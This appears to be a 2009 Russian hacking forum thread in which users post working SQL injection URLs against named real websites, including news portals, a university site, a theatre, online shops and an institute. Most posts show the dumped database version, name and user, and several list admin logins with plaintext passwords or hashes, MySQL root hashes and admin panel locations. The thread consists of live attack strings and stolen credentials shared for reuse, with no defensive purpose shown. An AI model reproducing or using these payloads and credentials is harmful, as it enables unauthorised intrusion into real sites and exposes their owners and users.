SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.cellulare-magazine.it/news.php?id=-1+union+select+1,2,3,concat _ws(0x3a,version (),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
    Database Version : 5.0.51a-3ubuntu5.4
    Database name : cel_mag
    User name : root@localhost


    хватаем админа:

    Code:
    http://www.cellulare-magazine.it/news.php?id=-1+union+select+1,2,3,4,concat _ws(0x3a ,user,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+mysql.user+limit+0,1--
    root:*BB9DD2A2E45245A1F1F7218330AD4AC2551D1498

    админка:

    Code:
    http://www.cellulare-magazine.it/ admin/
     
    #7781 f1ng3r, 15 Feb 2009
    Last edited: 15 Feb 2009
  2. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    Угадал
     
    #7782 kevmen, 15 Feb 2009
    Last edited: 15 Feb 2009
    1 person likes this.
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.portaldeasigurari.ro/stiriint.php?ann=2006&lunaa=-2+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8--




    Database Version: 5.0.51a-community
    Database name: romasigr_portal
    User name: romasigr_puser@localhost
     
  4. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    http://www.huntearth.com/searchsection.php?sc=-1+union+select+version()/*&s=Fishing%20Lodge&

    Database Version:4.1.22-standard
     
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.aparaturafiscala.ro/noutate.php?id=-12+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9




    Version : 4.1.22-log
    Database : aparaturafiscala_db
    User : aparaturafiscala@localhost
     
  6. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://cleanenergycouncil.org.au/news/showarticle.php?id=-1+union+select+1,concat _ws(0x3a,version(),data base(),user()),3,4,5,6,7,8,9,10,11--
    Database Version : 5.0.48
    Database name :cleanene_website
    User name : cleanene_website@localhost
     
  7. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Code:
    http://tristihii.ru/news-view.php?ID=-1+union+select+1,2,3,4,group_concat(concat(username,0x3a,password))+from+ADM_USERS--
    логины/пассы:
    Code:
    FIDUKOFF:lutic,SHISHKOV:lexa,ULA:shish,ADMIN:tristihii
    -----------------------------------------------------------
    Code:
    http://kolyada-theatre.ur.ru/history.php?ID=-1+union+select+1,2,3,concat(user_login,0x3a,user_pass),5,6,7,8,9,10,11,12+from+kol_users--
    логин/пасс:
    Code:
    admin:b0ac5c667f75a17da9b1ff11a1c59f6b
    --------------------------------------------------------------
    Code:
    http://www.e30club.ru/index.php?id=-116+union+select+1,concat(login,0x3a,password),3,4,5,6,7+from+ds_bmwstyle_users
    логин/пасс:
    Code:
    Newsmaker:newstyle
    ----------------------------------------------------------------
    Code:
    http://www.aquamaxservice.kiev.ua/articl.php?id=-6+union+select+1,2,3,concat(adm,0x3a,pass),5,6,7+from+admin--
    логин/пасс:
    Code:
    admin:Mjuehuh379
    -----------------------------------------------------------------
    The End!
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.graphicart.ro/graphic_art-COM-945GSE,_noul_Module_CPU_COM_Express_cu_procesorul_Atom_N270_de_la_Intel-12+AND+ASCII(SUBSTRING((select+concat_ws(0x3a,version(),database(),user())%20),26,1))=44.html



    Version : 5.0.18-log
    Database : graphicartro_gadb
    User : [email protected]
     
  9. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.stpsb.org/news.php?id=999999+union+select+1,2,3,concat _ws(0x3a ,version(),database(),user()),5,6,7,8,9,10,11,12--
    Database Version : 5.1.22-rc
    Database name : STPSB
    User name : stpsb@localhost


    админы и сисадмины:

    Code:
    http://www.stpsb.org/news.php?id=999999+union+select+1,2,3,concat _ws(0x3a,email ,password),5,6,7,8,9,10,11,12+from+users+limit+0,1--
    админка:

    Code:
    http://www.stpsb.org/ admin/
    вход по e-mail
     
  10. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Code:
    http://top.frontmen.ru/kom.php?id=-1+union+select+1,concat(login,0x3a,password),3,4,5,6+from+users--
    -------------------------------------------------------------
    The End!
     
  11. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    ТТ Финансы

    ТИЦ: 200
    PR: 5

    Database Version: 5.0.67-log
    Database name: u24363
    User name: [email protected]

    -----------------------------------------------------------------------------------------
    Российское Исламское Наследие

    ТИЦ: 90
    PR: 4

    Database Version: 5.0.67-log
    Database name: u24570_1
    User name: [email protected]

    ------------------------------------------------------------------------------------------
     
    #7791 zifanchuck, 15 Feb 2009
    Last edited by a moderator: 16 Feb 2009
  12. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.26000gezichten.nl/news.php?id=-1+union+select+1,2,3,4,concat _ws(0x3a, version(),database(),user()),6,7,8,9,10,11,13,14,15--
    Database Version : 4.0.24_Debian-10sarge2-log
    Database name : 26000gezichten
    User name : 26000gezichten@localhost
     
  13. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Еда

    Wcer.wisc.edu - pr7
    Unlv.edu - pr7
    http://www.unlv.edu/cgiwrap/webcgi/photogallery/index.php?cat_id=-15'+union+select+unhex(hex(version())),2/*&action=images
     
    #7793 sabe, 16 Feb 2009
    Last edited: 16 Feb 2009
    3 people like this.
  14. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Database Version: 4.0.23_Debian-3ubuntu2.4-log
    Database name: wizkit
    User name: peter@localhost


    root : 5ace410270df76e6


    PageRank = 6

    Database Version: 4.1.20-log
    Database name: cmmweb
    User name: cmmusr@mysql-cluster
     
    2 people like this.
  15. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Code:
    http://www.jezuici.pl/faber/think.php?what=kier&id=1%20union%20select%201,2,3,4,5,6,concat_ws(0x3a,id,nick,pass,name),8,9%20from%20bazylika_admins-- 
    (Админские данные)
    Code:
    http://www.jezuici.pl/faber/think.php?what=kier&id=1%20union%20select%201,2,3,4,5,6,table_name,8,9%20from%20information_schema.tables-- 
    ( Все таблицы)
    Code:
    http://www.jezuici.pl/bazylika/index/admin.php 
    (Админка)

    nick: pass: name
    PauluSJ: 18KVL08: Administrator

    Есть еще несколько админок кому нада тот думаю сам наковыряет.
     
    1 person likes this.
  16. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    шоп...

    Шоп...
    PR:4
    Code:
    http://linz-shopping.ru/linz-type.html?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(concat(login,0x3a,password)),13+from+kernel_users--
    логин/пасс:
    Code:
    root:roMdKE/jr382Q
    Code:
    pavel:pa6MMGOsPbNlE
    Code:
    linz:liXrWmY5KaAxI
    --------------------------------------------------------
    PR:2
    ТИЦ:80
    Code:
    http://www.africasia.com/themiddleeast/me.php?ID=-1973+union+select+concat_ws(version(),user(),database()),2,3,4,5,6,7,8,9--
    user/version/database:
    ----------------------------------------------------
    The End!
     
    #7796 -m0rgan-, 16 Feb 2009
    Last edited by a moderator: 16 Feb 2009
  17. [JavaScript]

    [JavaScript] Member

    Joined:
    14 Feb 2009
    Messages:
    45
    Likes Received:
    22
    Reputations:
    1
    Сайт института
    Code:
    http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user(),database(),version()))),5,6,7,8,9/*
    user:database:version
    Y1V0_4d31n@localhost:yivo_production:4.1.9-nt

    Code:
    http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user,password))),5,6,7,8,9+from+mysql.user/*
    user : password (MySQL)
    root:682a23ee48abb657


    Code:
    http://www.yivo.org/index.php?tid=1+and+null+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9+from+users+limit+0,1/*
    Users:
    Code:
    multimerge:mm4eva
    hello:password
    author1:password
    yivo:mm4yivo
     
    #7797 [JavaScript], 16 Feb 2009
    Last edited: 16 Feb 2009
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Девушки....

    http://www.escorts-romania.net/en_articles.php?sid=-3+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12




    Database Version: 4.1.25-Debian_mt1
    Database name: db24939_escorts
    User name: [email protected]
     
  19. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Code:
    http://www.incity.ac/ua/firms/insurance/alfa.php?city=-1%20union%20select%201,table_name,3,4,5,6,7%20from%20information_schema.tables-- 
    (Таблицы)

    Code:
    http://www.incity.ac/ua/firms/insurance/alfa.php?city=-1%20union%20select%201,concat_ws(0x3a,adm_name,adm_login,adm_password)%20,3,4,5,6,7%20from%20insity_adm-- 
    (Админские данные)

    adm_name
    ,adm_login,adm_password

    Andrew
    :incityadmin:incityadmin

    Админку не нашел.. =(
     
    1 person likes this.
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    summitmediapartners.com

    Code:
    http://www.summitmediapartners.com/filemgmt/singlefile.php?lid=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--
    5.0.67-community

    таблицы: gl_users
    колонки: username, passwd

    админка:
    Code:
    http://www.summitmediapartners.com/admin/moderation.php
     
    _________________________
    2 people like this.
Thread Status:
Not open for further replies.